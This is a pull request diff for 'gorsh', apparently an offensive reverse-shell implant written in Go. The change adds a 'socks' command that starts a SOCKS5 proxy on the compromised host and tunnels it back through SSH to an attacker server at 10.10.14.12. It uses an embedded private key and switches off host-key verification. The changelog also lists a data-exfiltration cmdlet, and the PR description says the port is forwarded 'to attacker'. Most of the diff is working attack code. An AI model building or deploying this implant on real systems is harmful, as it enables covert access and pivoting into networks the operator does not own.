### PR TITLE
adds reverse socks5 proxy functionality

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,4 +1,4 @@
-hershell
-hershell.exe
 server.*
 binaries
+id_*
+ssh.json

--- a/Makefile
+++ b/Makefile
@@ -8,7 +8,7 @@ OUT_WINDOWS=binaries/windows/${NAME}
 SRV_KEY=scripts/server.key
 SRV_PEM=scripts/server.pem
 
-BUILD=go build
+BUILD=packr build
 SRC=cmd/gorsh/main.go
 
 FINGERPRINT=$(shell openssl x509 -fingerprint -sha256 -noout -in ${SRV_PEM} | cut -d '=' -f2)
@@ -20,7 +20,8 @@ MINGW=x86_64-w64-mingw32-gcc-7.3-posix
 
 # zStd is a highly efficient compression library that requires CGO compilation If you'd like to
 # turn this feature on and have experience cross-compiling with cgo, enable the feature below for
-# win/64 and linux/64 implants ZSTD=-tags zstd
+# win/64 and linux/64 implants 
+# ZSTD=-tags zstd
 ZSTD=
 
 all: linux64 windows64 macos64 linux32 macos32 windows32 
@@ -28,6 +29,9 @@ all: linux64 windows64 macos64 linux32 macos32 windows32
 depends:
 	openssl req -subj '/CN=localhost/O=Localhost/C=US' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout ${SRV_KEY} -out ${SRV_PEM}
 	cat ${SRV_KEY} >> ${SRV_PEM}
+	ssh-keygen -t ed25519 -f configs/id_ed25519 -N ''
+	echo "Create a user with a /bin/false shell on the target ssh server that will be used "
+	echo "for socks forwarding. Also append the genereate pubkey to `authorized_keys`"
 
 listen:
 	KEY=${SRV_KEY} PEM=${SRV_PEM} LISTEN=scripts/listen.sh scripts/start.sh

--- a/README.md
+++ b/README.md
@@ -22,10 +22,14 @@ See the [Changelog](./docs/CHANGELOG.md)
 Check out the [official documentation](https://golang.org/doc/install) for an intro to developing
 with Go and setting up your Golang environment (with the `$GOPATH` environment variable).
 
+
 ```bash
 go get github.com/audibleblink/gorsh/...
 cd $GOPATH/src/github.com/audibleblink/gorsh
 ```
+
+Makefile assumes this project is being built on Linux.
+
 Be sure to read the Makefile. It gives you a good idea of what's going on.
 If enabled in `Makefile`, the `zipcat` cmdlet uses the zStandard compression library which requires
 `cgo` compilation.
@@ -34,11 +38,14 @@ the toolchains for it, or read [here](./docs/TROUBLESHOOTING.md) if you're feeli
 
 ### Usage
 
-First, generate your certs:
+First, generate your certs and ssh keys for the reverse proxy.
 
 ```bash
 $ make depends
 ```
+
+If you want to use `socks` feature, edit `configs/ssh.json`. Create a user on the SSH server
+and give it a `/bin/false` shell in `/etc/passwd`
 
 For the `make` targets, you only need the`LHOST`and`LPORT`environment variables.
 

--- a/cmd/gorsh/main.go
+++ b/cmd/gorsh/main.go
@@ -82,7 +82,7 @@ func CheckKeyPin(conn *tls.Conn, fingerprint []byte) bool {
 	return valid
 }
 
-// Creates the TLS connection before passing it to the InteractiveShell function
+// Reverse creates the TLS connection before passing it to the InteractiveShell function
 func Reverse(connectString string, fingerprint []byte) {
 	var (
 		conn *tls.Conn

--- a/configs/ssh.json.example
+++ b/configs/ssh.json.example
@@ -1,0 +1,5 @@
+{
+    "username": "proxyuser",
+    "host": "10.10.14.12", 
+    "port": 22
+}

--- a/docs/CHANGELOG.md
+++ b/docs/CHANGELOG.md
@@ -1,5 +1,6 @@
 Changes after fork:
 
+* Added a reverse SOCKS5 proxy over ssh. Configure in `configs/ssh.json`
 * Uses tmux as a pseudo-C2-like interface, creating a new window with each agent callback
 * zipcat: zip > base64 > cat for data small/medium data exfil (zstd/x64 or gzip/x86)
 * Remove the use of passing powershell/cmd commands at the main prompt

--- a/internal/commands/commands.go
+++ b/internal/commands/commands.go
@@ -10,6 +10,7 @@ import (
 	"github.com/audibleblink/gorsh/internal/directory"
 	"github.com/audibleblink/gorsh/internal/fetch"
 	"github.com/audibleblink/gorsh/internal/sitrep"
+	"github.com/audibleblink/gorsh/internal/socks"
 	"github.com/audibleblink/gorsh/internal/zip"
 )
 
@@ -45,6 +46,13 @@ func init() {
 			0,
 			false,
 			nil},
+		&Command{
+			"socks",
+			"<port>",
+			"Create a reverse SOCKS proxy on <port> over ssh",
+			1,
+			true,
+			socksFn},
 		&Command{
 			"cd",
 			"[path]",
@@ -129,6 +137,11 @@ func Route(argv []string) string {
 
 	output := cmd.Execute(argv)
 	return output
+}
+
+func socksFn(argv ...string) string {
+	socks.ListenAndForward(argv[1])
+	return "OK."
 }
 
 func cdFn(argv ...string) string {

--- a/internal/socks/socks.go
+++ b/internal/socks/socks.go
@@ -1,0 +1,22 @@
+package socks
+
+import (
+	"fmt"
+
+	"github.com/armon/go-socks5"
+	"github.com/audibleblink/gorsh/internal/sshtacr"
+)
+
+func ListenAndForward(port string) {
+	// Create a SOCKS5 server
+	conf := &socks5.Config{}
+	server, err := socks5.New(conf)
+	if err != nil {
+		panic(err)
+	}
+
+	// Create SOCKS5 proxy on localhost
+	connectString := fmt.Sprintf("127.0.0.1:%s", port)
+	go server.ListenAndServe("tcp", connectString)
+	go sshtacr.ForwardService(port)
+}

--- a/internal/sshtacr/sshtacr.go
+++ b/internal/sshtacr/sshtacr.go
@@ -1,0 +1,101 @@
+package sshtacr
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+	"log"
+	"net"
+
+	"github.com/gobuffalo/packr"
+	"golang.org/x/crypto/ssh"
+)
+
+type sshServer struct {
+	Username string `json:"username"`
+	Host     string `json:"host"`
+	Port     int    `json:"port"`
+}
+
+func (s *sshServer) String() string {
+	return fmt.Sprintf("%s:%d", s.Host, s.Port)
+}
+
+// From https://sosedoff.com/2015/05/25/ssh-port-forwarding-with-go.html
+// Handle local client connections and tunnel data to the remote server
+// Will use io.Copy - http://golang.org/pkg/io/#Copy
+func handleClient(client net.Conn, remote net.Conn) {
+	defer client.Close()
+	chDone := make(chan bool)
+
+	// Start remote -> local data transfer
+	go func() {
+		_, err := io.Copy(client, remote)
+		if err != nil {
+			log.Println(fmt.Sprintf("error while copy remote->local: %s", err))
+		}
+		chDone <- true
+	}()
+
+	// Start local -> remote data transfer
+	go func() {
+		_, err := io.Copy(remote, client)
+		if err != nil {
+			log.Println(fmt.Sprintf("error while copy local->remote: %s", err))
+		}
+		chDone <- true
+	}()
+
+	<-chDone
+}
+
+func ForwardService(port string) {
+
+	connectStr := fmt.Sprintf("127.0.0.1:%s", port)
+	box := packr.NewBox("../../configs")
+	privateKeyString := box.Bytes("id_ed25519")
+	configs := box.Bytes("ssh.json")
+	server := sshServer{}
+	if err := json.Unmarshal(configs, &server); err != nil {
+		panic(err)
+	}
+
+	privateKey, err := ssh.ParsePrivateKey(privateKeyString)
+	auth := ssh.PublicKeys(privateKey)
+
+	sshConfig := &ssh.ClientConfig{
+		User:            server.Username,
+		Auth:            []ssh.AuthMethod{auth},
+		HostKeyCallback: ssh.InsecureIgnoreHostKey(),
+	}
+
+	// Connect to SSH remote server using serverEndpoint
+	serverConn, err := ssh.Dial("tcp", server.String(), sshConfig)
+	if err != nil {
+		log.Fatalln(fmt.Printf("Dial INTO remote server error: %s", err))
+	}
+
+	// Listen on remote server port
+	listener, err := serverConn.Listen("tcp", connectStr)
+	if err != nil {
+		log.Fatalln(fmt.Printf("Listen open port ON remote server error: %s", err))
+	}
+	defer listener.Close()
+
+	// handle incoming connections on reverse forwarded tunnel
+	for {
+		// Open a (local) connection to localEndpoint whose content will be forwarded so serverEndpoint
+		local, err := net.Dial("tcp", connectStr)
+		if err != nil {
+			log.Fatalln(fmt.Printf("Dial INTO local service error: %s", err))
+		}
+
+		client, err := listener.Accept()
+		if err != nil {
+			log.Fatalln(err)
+		}
+
+		handleClient(client, local)
+	}
+
+}


### PR DESCRIPTION
  - Implant creates a socks5 proxy at the designated port
  - Socks port is forwarded to attacker with `ssh -R` equiv in Go
  - Makefile generates ssh keys
  - Adds build-time variable processing for embedding config & keys